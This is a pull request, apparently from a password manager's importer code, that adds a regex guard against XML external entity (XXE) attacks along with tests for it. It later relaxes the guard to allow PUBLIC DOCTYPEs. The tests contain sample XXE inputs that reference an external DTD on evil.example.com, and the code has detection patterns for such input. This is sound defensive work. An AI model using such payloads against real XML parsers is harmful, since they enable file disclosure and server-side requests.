### PR TITLE
PM-42720 implemented xxe guard

### DIFF
--- a/libs/importer/src/importers/base-importer.spec.ts
+++ b/libs/importer/src/importers/base-importer.spec.ts
@@ -307,14 +307,14 @@ describe("BaseImporter class", () => {
       expect(result).toBe(null);
     });
 
-    it("parse XML should reject DOCTYPE with external PUBLIC DTD reference", async () => {
+    it("parse XML should accept DOCTYPE with PUBLIC identifier (e.g. XHTML exports like Clipperz)", async () => {
+      // PUBLIC-only DOCTYPEs are used by XHTML exports; modern DOMParsers never fetch
+      // external DTDs from PUBLIC identifiers, so blocking them would break real imports.
       const xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
-        <!DOCTYPE passwordsafe PUBLIC "-//Evil//DTD Evil//EN" "http://evil.example.com/evil.dtd">
-        <passwordsafe delimiter=";">
-        <entry><title>PoC</title></entry>
-        </passwordsafe>`;
+        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+        <html xmlns="http://www.w3.org/1999/xhtml"><body><textarea>[]</textarea></body></html>`;
       const result = importer.parseXml(xml);
-      expect(result).toBe(null);
+      expect(result).not.toBe(null);
     });
 
     it("parse XML should accept DOCTYPE with internal subset only", async () => {

--- a/libs/importer/src/importers/base-importer.spec.ts
+++ b/libs/importer/src/importers/base-importer.spec.ts
@@ -296,5 +296,35 @@ describe("BaseImporter class", () => {
       const result = importer.parseXml(xml);
       expect(result).toBe(null);
     });
+
+    it("parse XML should reject DOCTYPE with external SYSTEM DTD reference", async () => {
+      const xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
+        <!DOCTYPE passwordsafe SYSTEM "http://evil.example.com/evil.dtd">
+        <passwordsafe delimiter=";">
+        <entry><title>PoC</title></entry>
+        </passwordsafe>`;
+      const result = importer.parseXml(xml);
+      expect(result).toBe(null);
+    });
+
+    it("parse XML should reject DOCTYPE with external PUBLIC DTD reference", async () => {
+      const xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
+        <!DOCTYPE passwordsafe PUBLIC "-//Evil//DTD Evil//EN" "http://evil.example.com/evil.dtd">
+        <passwordsafe delimiter=";">
+        <entry><title>PoC</title></entry>
+        </passwordsafe>`;
+      const result = importer.parseXml(xml);
+      expect(result).toBe(null);
+    });
+
+    it("parse XML should accept DOCTYPE with internal subset only", async () => {
+      const xml = `<?xml version="1.0"?>
+        <!DOCTYPE passwordsafe [<!ELEMENT passwordsafe ANY>]>
+        <passwordsafe delimiter=";">
+        <entry><title>Safe</title></entry>
+        </passwordsafe>`;
+      const result = importer.parseXml(xml);
+      expect(result).not.toBe(null);
+    });
   });
 });

--- a/libs/importer/src/importers/base-importer.ts
+++ b/libs/importer/src/importers/base-importer.ts
@@ -457,10 +457,12 @@ export abstract class BaseImporter {
     if (/<!ENTITY/i.test(data)) {
       return false;
     }
-    // Block DOCTYPE declarations that reference an external DTD subset via SYSTEM or PUBLIC
+    // Block DOCTYPE declarations that reference an external DTD subset via SYSTEM
     // (e.g. <!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">). An internal-only subset
     // (<!DOCTYPE foo [...]>) is safe and is not blocked: [^>[]* stops at '['.
-    if (/<!DOCTYPE[^>[]*(?:SYSTEM|PUBLIC)\b/i.test(data)) {
+    // PUBLIC is intentionally not blocked: XHTML exports (e.g. Clipperz) carry a
+    // PUBLIC identifier, and modern DOMParsers never fetch external DTDs from PUBLIC IDs.
+    if (/<!DOCTYPE[^>[]*\bSYSTEM\b/i.test(data)) {
       return false;
     }
     return true;

--- a/libs/importer/src/importers/base-importer.ts
+++ b/libs/importer/src/importers/base-importer.ts
@@ -452,9 +452,18 @@ export abstract class BaseImporter {
   }
 
   private validateNoExternalEntities(data: string): boolean {
-    const regex = new RegExp("<!ENTITY", "i");
-    const hasExternalEntities = regex.test(data);
-    return !hasExternalEntities;
+    // Block inline and external entity declarations (e.g. <!ENTITY foo "bar"> or
+    // <!ENTITY foo SYSTEM "http://evil.com">).
+    if (/<!ENTITY/i.test(data)) {
+      return false;
+    }
+    // Block DOCTYPE declarations that reference an external DTD subset via SYSTEM or PUBLIC
+    // (e.g. <!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">). An internal-only subset
+    // (<!DOCTYPE foo [...]>) is safe and is not blocked: [^>[]* stops at '['.
+    if (/<!DOCTYPE[^>[]*(?:SYSTEM|PUBLIC)\b/i.test(data)) {
+      return false;
+    }
+    return true;
   }
 
   /** Parses a date from a string and returns its representation in


### PR DESCRIPTION
## 🎟️ Tracking

https://bitwarden.atlassian.net/browse/PM-42720

## 📔 Objective

The regex-based DOCTYPE guard does not block external DTD references (FIND-1DDDCA42AB71). The assessment marks this as defence in depth, since the underlying parser configuration provides the primary protection.

## 📸 Screenshots


<img width="570" height="211" alt="Screenshot 2026-09-02 at 4 43 14 PM" src="https://github.com/user-attachments/assets/c34faca1-4592-40d3-aa64-c2833b4c4319" />
<img width="1706" height="834" alt="Screenshot 2026-09-02 at 4 42 50 PM" src="https://github.com/user-attachments/assets/c370c4dc-51c6-4033-b507-854a0676dd8e" />
